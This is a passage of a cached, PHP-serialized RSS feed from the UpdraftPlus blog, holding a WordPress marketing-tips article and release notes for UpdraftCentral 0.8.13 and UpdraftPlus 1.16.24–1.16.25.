rel=\"nofollow\" href=\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/\">5 effective on-site marketing tips for your WordPress site</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:12704:\"<p><span style=\"font-weight: 400;\">With </span><a href=\"https://www.whoishostingthis.com/compare/wordpress/stats/#:~:text=Considering%20that%20the%20number%20of,WordPress%2C%20which%20is%20still%20huge.\"><span style=\"font-weight: 400;\">1.3 billion</span></a><span style=\"font-weight: 400;\"> websites, WordPress is by far and away the top choice for website creation across the world. The platform&#8217;s popularity comes from allowing users to easily create personal sites, purchase domain names and customize the site with easy to use, no-development-needed plugins. Since its launch in 2003, WordPress has made the world of site creation accessible for everyone. </span></p>\n<p><span style=\"font-weight: 400;\">If you have created your own WordPress site and customized it to your personal preference, your next step will probably be figuring out how you market and drive traffic to your brand new site.</span></p>\n<p><span style=\"font-weight: 400;\">This can prove to be very challenging. You could have the greatest idea and site in the world, but without the right marketing, it could remain essentially invisible and un-visited. Luckily, we have 5 of the best tips for successfully marketing your WordPress site.</span></p>\n<h3><span style=\"font-weight: 400;\">1. Use the right plugins</span></h3>\n<p><span style=\"font-weight: 400;\">WordPress allows you to easily integrate plugins so you can make improvements to your website without having to code them yourself. Plugins are extensions that add features, data analytics, and other resources to assist your website. However, you may not know how to </span><a href=\"https://wpforms.com/best-free-wordpress-plugins-for-your-website/\"><span style=\"font-weight: 400;\">choose the plugins</span></a><span style=\"font-weight: 400;\"> that will be best for your site.</span></p>\n<p><span style=\"font-weight: 400;\">Choosing the right plugins for your website comes down to identifying exactly what needs improving, or where you can get a competitive edge on your competitors. For example, you can find plugins that offer features such as these:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Improving your SEO (making it more findable).</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Allowing you to </span><a href=\"https://wordpress.org/plugins/wp-optimize/\"><span style=\"font-weight: 400;\">resize and compress images</span></a><span style=\"font-weight: 400;\"> on your website ( making it faster).</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Gathering, collecting, and adding email addresses to your newsletter (making it easier to connect with your visitors).<br />\n</span></li>\n<li>Are <a href=\"https://www.omnisend.com/blog/woocommerce-plugins/\">tailored for e-commerce</a> (making it easier to sell products on your website).</li>\n</ul>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/image4.png\"><img class=\"alignnone wp-image-621074\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/image4.png\" alt=\"\" width=\"718\" height=\"458\" /></a></p>\n<p><a href=\"https://wordpress.org/plugins/\"><span style=\"font-weight: 400;\">Source</span></a></p>\n<p><span style=\"font-weight: 400;\">WordPress allows you to easily find popular plugins that others use. You can also search for specific plugins in the internal WordPress search engine &#8211; you should have no problems finding the right plugin to address issues or provide changes for your website.</span></p>\n<h3><span style=\"font-weight: 400;\">2. Optimize your website</span></h3>\n<p><span style=\"font-weight: 400;\">Internet users today expect any website they visit to load almost instantly and provide quick answers. Due to this expectation, it is essential you </span><a href=\"https://looka.com/blog/how-to-make-your-own-website/\"><span style=\"font-weight: 400;\">optimize your website</span></a><span style=\"font-weight: 400;\"> and reduce load times so people can quickly access it. Even a few seconds can make the difference between someone staying on your site or leaving.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/image3.png\"><img class=\"alignnone wp-image-621077\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/image3.png\" alt=\"\" width=\"522\" height=\"206\" /></a></p>\n<p><a href=\"https://hostreviews.co.uk/website-speed-statistics/\"><span style=\"font-weight: 400;\">Source</span></a></p>\n<p><span style=\"font-weight: 400;\">Every second counts when it comes to website loading speed. The image above shows how the bounce rate increases by 32 percent after visitors are forced to wait three seconds for the website to load. This continues to grow and become worse as more time passes. So, if you want to reduce the number of people that leave your site, you need to lower those load times.</span></p>\n<p><span style=\"font-weight: 400;\">Some options to improve your loading speed include purchasing a private or shared hosting service, removing unused plugins and optimizing your images. Even small optimizations like these can help your site to load slightly faster and retain more visitors.</span></p>\n<h3><span style=\"font-weight: 400;\">3. Use A/B testing for landing pages</span></h3>\n<p><a href=\"https://monday.com/blog/marketing/marketing-teams/\"><span style=\"font-weight: 400;\">Effective marketing</span></a><span style=\"font-weight: 400;\"> requires you to collect data so you can implement the right changes to your website. Many companies use the A/B testing approach to accomplish this, meaning that websites will display two different versions of landing pages to visitors. They will then collect the data for both (for example; session time, click rates, click map) so they can see exactly which elements are working well and which are not. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/image5.png\"><img class=\"alignnone wp-image-621079\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/image5.png\" alt=\"\" width=\"622\" height=\"474\" /></a></p>\n<p><a href=\"https://financesonline.com/a-b-testing-statistics/\"><span style=\"font-weight: 400;\">Source</span></a></p>\n<p><span style=\"font-weight: 400;\">The image above shows how a company can improve their metrics with A/B testing. This method can also be used in multiple ways to help improve your pages, emails and other resources.</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Testing colors will let you know which ones appeal most to your customers.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Trying out different email formats and subject lines to get more clicks.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Showing different landing pages will help you to find the one that draws in most leads.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">A/B testing works because it allows you to see which idea performs the best. This way, you can effectively test your pages and optimize them to their maximum potential.</span></p>\n<h3><span style=\"font-weight: 400;\">4. Integrate pop-ups to gain contacts</span></h3>\n<p><span style=\"font-weight: 400;\">If you’ve been on the internet before, then you will no doubt know about pop-ups. They usually appear on your screen as soon as you go on a website or if you’re about to leave. Even if you do use popups on your site, you might think that they could cause people to leave as they can generally be seen as annoying. So are they worth the risk?</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/image1.png\"><img class=\"alignnone size-full wp-image-621080\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/image1.png\" alt=\"\" width=\"610\" height=\"278\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/07/image1.png 610w, https://updraftplus.com/wp-content/uploads/2020/07/image1-480x219.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 610px, 100vw\" /></a></p>\n<p><a href=\"https://www.ipaper.io/blog/popups-for-websites-and-flipbooks\"><span style=\"font-weight: 400;\">Source</span></a></p>\n<p><span style=\"font-weight: 400;\">Looking at the data, you can see that popups have no noticeable effect on your bounce rate but they can double your subscription rate. This suggests that typically you needn’t worry about pop-ups causing people to leave as it has no discernible impact on user behaviour. The benefits of popups seem to heavily outweigh the drawbacks.</span></p>\n<p><span style=\"font-weight: 400;\">There are a few best practices to follow with popups:</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Whether you choose an immediate popup, or an exit-intent popup, choose one or the other and don’t overdo it. It can feel spammy otherwise. </span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Target your popups to be relevant to the page content. This makes it feel more native to the content that your visitor is already engaged with.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Make it so that if a visitor closes a popup, they won’t see it again for a certain amount of time. 30 days is usually a good benchmark for when you can re-show a returning visitor, but test that time frame for your own site. </span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">Remember that you can use popups to encourage certain actions from your visitors. For example, you can invite them to follow your social media pages, make an account on your website, or sign up to get emails or SMS notifications from you. Experiment and find the best approach for your popups.</span></p>\n<h3><span style=\"font-weight: 400;\">5. Optimize your blogs</span></h3>\n<p><span style=\"font-weight: 400;\">If you want to improve your website’s SEO, then you should focus on your blogs as they can help your business grow in various ways..</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Provide high-quality content on your website.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Encourage people to visit your website regularly to read articles.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Include keywords in your articles to improve your search engine rankings.</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Create fresh content that updates frequently, something which Google prizes highly in its search engine algorithm.</span></li>\n</ul>\n<p><span style=\"font-weight: 400;\">But what parts of your article should you focus on to improve your site&#8217;s SEO?</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/image2.png\"><img class=\"alignnone wp-image-621082\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/image2.png\" alt=\"\" width=\"543\" height=\"543\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/07/image2.png 543w, https://updraftplus.com/wp-content/uploads/2020/07/image2-480x480.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 543px, 100vw\" /></a></p>\n<p><a href=\"https://databox.com/blog-seo-tips\"><span style=\"font-weight: 400;\">Source</span></a></p>\n<p><span style=\"font-weight: 400;\">If you don’t know where to start with blog optimization, then use the data above. Headline optimization works well because your titles will draw in clicks from outbound links and search engines. Additionally headers and body text allow you to incorporate keywords that can help improve your search engine ranking.</span></p>\n<p><span style=\"font-weight: 400;\">As you improve your blog SEO, you can gain more traffic on your website which will hopefully develop into more leads and conversions if your sales funnel is well-optimized.</span></p>\n<h3><span style=\"font-weight: 400;\">Final comments</span></h3>\n<p><span style=\"font-weight: 400;\">Remember that creating a website is only the first part of establishing your online presence. After providing a place for people to make purchases or interact with your business, you need to work on marketing. By using the five tips mentioned in this article, you can improve your site and allow your business to meet its marketing goals.</span></p>\n<p>Laura Narusyte</p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/\">5 effective on-site marketing tips for your WordPress site</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://updraftplus.com/5-effective-on-site-marketing-tips-for-your-wordpress-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:66:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"UpdraftCentral release new 0.8.13 (free and paid) update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/UKOKPjJAPcA/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 01 Jul 2020 14:22:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:14:\"UpdraftCentral\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:20:\"UpdraftCental Update\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:14:\"updraftcentral\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:26:\"updraftcentral development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=609297\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:690:\"<p>The latest updates for UpdraftCentral (0.8.13) have now been released. This new release comes loaded with many new features, fixes and tweaks. One of the new features in this update now allows you to upload your plugins and themes while &#8230; <a href=\"https://updraftplus.com/0-8-13-release/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/0-8-13-release/\">UpdraftCentral release new 0.8.13 (free and paid) update</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5056:\"<p><span style=\"font-weight: 400;\">The latest updates for <a href=\"https://en-gb.wordpress.org/plugins/updraftcentral/\">UpdraftCentral</a> (0.8.13) have now been released. This new release comes loaded with many new features, fixes and tweaks.</span></p>\n<p><span style=\"font-weight: 400;\">One of the new features in this update now allows you to upload your plugins and themes while they are still in their zip format. To do this, you first need to install <a href=\"https://updraftplus.com/shop/updraftcentral-dashboard/\">UpdraftCentral Premium</a>. Once this is installed, just press the &#8216;Plugins&#8217; or &#8216;Themes&#8217; menu item, then select &#8216;Install Plugins&#8217; and you will now be able to drag and drop your zip file and upload it directly.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0.png\"><img class=\"size-full wp-image-609341 aligncenter\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0.png\" alt=\"\" width=\"544\" height=\"274\" srcset=\"https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0.png 544w, https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0-480x242.png 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 544px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">Another new feature in this update gives</span><span style=\"font-weight: 400;\"> users even more control over remote storage options. Anytime you create a backup with UpdraftCentral, you can now select which of the remote storage locations you would like to send the backup to. </span><span style=\"font-weight: 400;\">Just open the following dialogue box in UpdraftCentral and you can select or deselect the remote storage options of your choice.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0-1.png\"><img class=\"wp-image-609342 aligncenter\" src=\"https://updraftplus.com/wp-content/uploads/2020/07/pasted-image-0-1.png\" alt=\"\" width=\"367\" height=\"492\" /></a></p>\n<p><span style=\"font-weight: 400;\">In addition to these new updates, we have also made various tweaks and fixes to keep UpdraftCentral running smooth and compatible with future WordPress and PHP releases.</span></p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>FEATURE</strong>: Added the ability to choose the remote storage locations you want to send your backup to in the “Backup Now” modal</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>FIX</strong>: Fix scheduled commands execution through WP cron</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>FIX</strong>: Fix can’t delete backup item without refreshing the list after a successful restore process</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>FIX</strong>: Fix layout/css glitch on the backup settings page</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>FIX</strong>: Fix popper.js related error and warning</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Improve UX and accessibility with better keyboard navigation</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Register updates retrieval to run in the background</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Add editor class for page and post modules</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Add new error message to the rpcerrors collection</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Show upload errors in dialog as well as in browser console if debug level is set</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Improve JavaScript’s compatibility with minification and merging, in particular WP-Optimize</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Add REST controller files for page and post modules</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Add internal capability to install plugin or theme through zip file</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Upgrade Bootstrap and Bootbox libraries to current versions</span></li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\"><strong>TWEAK</strong>: Force the connection method ‘via_mothership’ if the command is in the UpdraftClone namespace</span></li>\n</ul>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/0-8-13-release/\">UpdraftCentral release new 0.8.13 (free and paid) update</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"https://updraftplus.com/0-8-13-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"UpdraftPlus release latest 1.16.25 (free &amp; paid) version\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/chqnBB_gJFE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 08 Jun 2020 09:55:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:28:\"UpdraftPlus development news\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:23:\"UpdraftPlus development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=594176\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:784:\"<p>The latest updates for UpdraftPlus (1.16.24 and 1.16.25) have now been released. These latest releases come with many new features, fixes and tweaks including the newly added ability to choose the remote storage locations that you would like to send &#8230; <a href=\"https://updraftplus.com/updraftplus-release-latest-1-16-25-free-paid-version/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/updraftplus-release-latest-1-16-25-free-paid-version/\">UpdraftPlus release latest 1.16.25 (free &#038; paid) version</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5053:\"<p><span style=\"font-weight: 400;\">The latest updates for UpdraftPlus (1.16.24 and 1.16.25) have now been released. These latest releases come with many new features, fixes and tweaks including the newly added ability to choose the remote storage locations that you would like to send your backups to in the “Backup Now” modal. This new feature gives users the ability to make a quick backup to just one of your backup storage destinations should you need to backup to just one location. </span></p>\n<p><span style=\"font-weight: 400;\">This update also gives users the option to configure a remote backup storage location (that may be disabled in your settings) and select it to upload to this storage location. This can be particularly useful if you are using UpdraftValt for your main scheduled backups, but still want to make a one off backup that could (for example) include temporary theme changes that you do not want to store alongside your regular backups.</span></p>\n<p><span style=\"font-weight: 400;\">As part of this update we are also improving our database backup and restore code so that it will now support migration between different ‘generate columns’ syntaxes of MySQL and MariaDB. This will help with migrations between different servers when users are using different databases. We have also added other useful improvements to the update including; handling binary data during backup and added support for the AWS Miland and Cape Town endpoints. </span></p>\n<p><span style=\"font-weight: 400;\">In addition to these new updates, we have also made various tweaks and fixes to keep UpdraftPlus running smooth and compatible with future WordPress and PHP releases.</span></p>\n<p><b>1.16.25 </b></p>\n<ul>\n<li><span style=\"font-weight: 400;\">FIX: Dropbox since 1.16.24 was only deleting one backup files archive out of the set. i.e. Excess archives remained on Dropbox. These have to be deleted manually.</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Add version to CSS and JS within filenames to prevent old versions being served after update on sites which have customisations to remove the query string</span></li>\n</ul>\n<p><b>1.16.24 </b></p>\n<ul>\n<li><span style=\"font-weight: 400;\">FEATURE: Support migration between different “generate columns” syntaxes of MySQL and MariaDB</span></li>\n<li><span style=\"font-weight: 400;\">FEATURE: Added the ability to choose the remote storage locations you want to send your backup to in the “Backup Now” modal</span></li>\n<li><span style=\"font-weight: 400;\">FIX: If non-WordPress tables are selected in the advanced ‘Backup Now’ options, then back them up (even if the saved setting to back them up is off). i.e. “Backup Now” over-ride options should have been taking priority.</span></li>\n<li><span style=\"font-weight: 400;\">FIX: Failure to restore database ‘view’ in some rare circumstances due to the nonexistent DEFINER account and lack of privileges</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Handle binary data during backup</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Add strack_st to the lists of large logging tables and tables not requiring search/replace</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Make search and replace case insensitive when operating on URLs</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: The incremental backup notice logic</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Update bundled updater class (YahnisElsts/plugin-update-checker) (paid versions) to version 4.9</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Add another tweak to paid versions’ update checking time algorithm</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Add the options_exist() method to backup modules that did not have it</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: During manual backup uploads, check if the last 4 bytes are string “null” (caused by an error in uploading to Dropbox) and if so remove them. Prevents an unnecessary message about unexpected data.</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Show the backup label (if specified) in the UI backup progress indicator</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Added the facility to clear the list of existing migration sites</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Create default instance labels</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Bring list of debugging plugins up to date</span></li>\n<li><span style=\"font-weight: 400;\">TWEAK: Add support for the AWS Milan and Cape Town endpoints (and correct a couple of existing endpoints that had wrong references)</span></li>\n</ul>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/updraftplus-release-latest-1-16-25-free-paid-version/\">UpdraftPlus release latest 1.16.25 (free &#038; paid) version</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://updraftplus.com/updraftplus-release-latest-1-16-25-free-paid-version/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:91:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"WP-Optimize updated with new Minify 